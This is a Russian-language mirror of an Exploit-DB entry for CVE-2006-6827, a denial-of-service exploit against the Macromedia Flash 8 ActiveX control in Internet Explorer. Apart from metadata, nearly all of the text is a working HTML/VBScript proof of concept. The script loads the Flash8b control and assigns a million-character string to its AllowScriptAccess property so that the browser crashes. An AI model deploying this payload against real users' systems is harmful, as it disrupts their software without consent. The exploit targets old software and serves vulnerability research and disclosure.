- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3041
- Проверка EDB
-
- Пройдено
- Автор
- SHINNAI
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2006-6827
- Дата публикации
- 2006-12-29
HTML:
<!--
--------------------------------------------------------------------------
Macromedia Flash 8 (Flash8b.ocx) Internet Explorer Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
---------------------------------------------------------------------------
-->
<html>
<object classid='clsid:D27CDB6E-AE6D-11CF-96B8-444553540000' id='Flash8b'></object>
<script language='vbscript'>
argCount = 1
arg1=String(1000000, "A")
Flash8b.AllowScriptAccess=arg1
</script>
# milw0rm.com [2006-12-29]
- Источник
- www.exploit-db.com